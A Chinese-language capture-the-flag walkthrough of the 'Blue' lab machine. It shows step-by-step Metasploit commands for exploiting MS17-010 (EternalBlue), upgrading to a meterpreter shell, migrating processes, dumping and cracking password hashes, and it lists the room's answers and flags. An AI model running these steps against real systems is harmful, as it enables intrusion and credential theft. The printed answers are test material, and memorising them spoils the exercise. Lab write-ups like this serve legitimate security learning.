emmm,这个应该就是永恒之蓝了hhh

Blue


*Recon

启动靶机和内网机,使用以下命令进行扫描:

nmap -A -T 5 -p- 10.10.159.213

image-20200713114653348.png

可以看到1000端口内有3个端口是开的,分别是 135 139 445 ,显然这个靶机开了SMB服务。

使用漏扫:

nmap 10.10.159.213 --script vuln

image-20200713115608317.png

用漏扫得到漏洞。

问题答案:

#2How many ports are open with a port number under 1000?

3

#3What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

ms17-010

*Gain Access

那么这就需要用到Metasploit了,首先初始化Metasploit的数据库:

msfdb init

image-20200713115934305.png

启动Metasploit,扫描可用模块:

msfconsole -q
search ms17_010

image-20200713120108054.png

那么,就使用这个了:

use 2
# 或者
use exploit/windows/smb/ms17_010_eternalblue
show options

image-20200713120217750.png

设置一下选项:

set RHOST 10.10.159.213

image-20200713120320162.png

那么,触发:

exploit

image-20200713120359561.png

现在拿到了普通的shell了,下一步是先将这个会话挂起,然后升级为meterpreter的shell。

问题答案:

#2Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

exploit/windows/smb/ms17_010_eternalblue

#3Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS

*Escalate

现在是将普通shell提升为meterpreter的shell。

先按下 ctrl + z 将当前普通shell 的会话挂起:

ctrl + z

image-20200713120637682.png

然后使用以下模块升级为meterpreter的shell:

use post/multi/manage/shell_to_meterpreter
show options

image-20200713120829485.png

把SESSION设置成刚才的会话的ID即可,输入以下命令可以查看当前的会话:

sessions -l

image-20200713120944155.png

那么设置好SESSION后,就可以使用以下命令触发了:

run/exploit 都一样

image-20200713121152419.png

看到会话2已经开启,那么就可以使用以下命令进入会话2了:

sessions -i 2

image-20200713121459413.png

目前已经是meterpreter的shell了,然后可以输入以下命令查看当前用户的身份:

getuid

image-20200713121549484.png

得到一个不低的权限,但这还不够,因为虽然目前用户的权限是系统权限,但并不代表当前的进程是,也就是说当前进程无法使用系统权限的命令,那么下一步是迁徙到拥有系统权限的进程了。

首先输入以下命令列出当前所有进程:

ps

image-20200713121836275.png

显而易见,进程ID为 2164的cmd.exe进程拥有系统权限,那么就迁徙它吧。

migrate 2164

image-20200713122053335.png

成功了,可以用以下命令查看当前特权:

getprivs

image-20200713122147195.png

问题答案:

#1If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

post/multi/manage/shell_to_meterpreter

#2Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

SESSION

*Cracking

这里可以使用以下命令列出系统用户的hash数据:

hashdump

image-20200713122348832.png

可以看到多了 Jon 用户,将这一段copy下来,然后用jhon工具破解吧。

john --user=Jon --wordlist=/usr/share/wordlists/rockyou.txt --format=NT pass

image-20200713122905155.png

得到密码 alqfna22。

问题答案:

#1Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

#2Copy this password hash to a file and research how to crack it. What is the cracked password?

alqfna22

*Find flags!

由于现在得到了系统权限,找flag就很简单了。

万能语句:

dir /S /B | findstr /I "flag*"

第一个flag在C:\下:

image-20200713123212512.png

第二个flag在C:\windows\system32\config目录下:

image-20200713123318136.png

第三个flag在Jon用户的文档中:

image-20200713123514626.png

问题答案:

#1Flag1? (Only submit the flag contents {CONTENTS})

access_the_machine

#2Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.

sam_database_elevated_access

#3flag3?

admin_documents_can_be_valuable